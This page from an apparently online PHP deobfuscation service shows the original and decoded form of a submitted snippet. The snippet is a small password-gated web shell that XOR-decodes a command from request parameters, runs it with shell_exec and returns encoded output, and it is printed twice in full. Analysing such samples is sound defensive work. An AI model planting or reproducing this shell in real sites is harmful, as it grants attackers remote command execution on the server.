Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function LdjiPingfh($BhFLCeuRkU,$bawYzBSRMS){$CmdYOdoYLf=""; for($zJEojmeyki=0;$zJEojmeyk..

Decoded Output download

<?  function LdjiPingfh($BhFLCeuRkU,$bawYzBSRMS){$CmdYOdoYLf=""; 
for($zJEojmeyki=0;$zJEojmeyki<strlen($bawYzBSRMS);$zJEojmeyki++) 
{ 
$CmdYOdoYLf=$CmdYOdoYLf.($bawYzBSRMS[$zJEojmeyki]^$BhFLCeuRkU[$zJEojmeyki%strlen($BhFLCeuRkU)]); 
} 
return base64_encode($CmdYOdoYLf); 
} 
if(isset($_REQUEST['key'])  &&  isset($_REQUEST['command'])) 
{ 
if(base64_decode($_REQUEST['key']) !== 'loremipsum') 
{ 
die();}echo "D00D00D00".LdjiPingfh($_REQUEST['command'],shell_exec(base64_decode(LdjiPingfh(base64_decode($_REQUEST['key']),base64_decode($_REQUEST['command'])))))."WUBWUBWUB";} How would i decode the echo of this ?>

Did this file decode correctly?

Original Code

function LdjiPingfh($BhFLCeuRkU,$bawYzBSRMS){$CmdYOdoYLf="";
for($zJEojmeyki=0;$zJEojmeyki<strlen($bawYzBSRMS);$zJEojmeyki++)
{
$CmdYOdoYLf=$CmdYOdoYLf.($bawYzBSRMS[$zJEojmeyki]^$BhFLCeuRkU[$zJEojmeyki%strlen($BhFLCeuRkU)]);
}
return base64_encode($CmdYOdoYLf);
}
if(isset($_REQUEST['key'])  &&  isset($_REQUEST['command']))
{
if(base64_decode($_REQUEST['key']) !== 'loremipsum')
{
die();}echo "D00D00D00".LdjiPingfh($_REQUEST['command'],shell_exec(base64_decode(LdjiPingfh(base64_decode($_REQUEST['key']),base64_decode($_REQUEST['command'])))))."WUBWUBWUB";} How would i decode the echo of this

Function Calls

None

Variables

None

Stats

MD5 3cf0e770fe35cf3b92014735d9a7543a
Eval Count 0
Decode Time 37 ms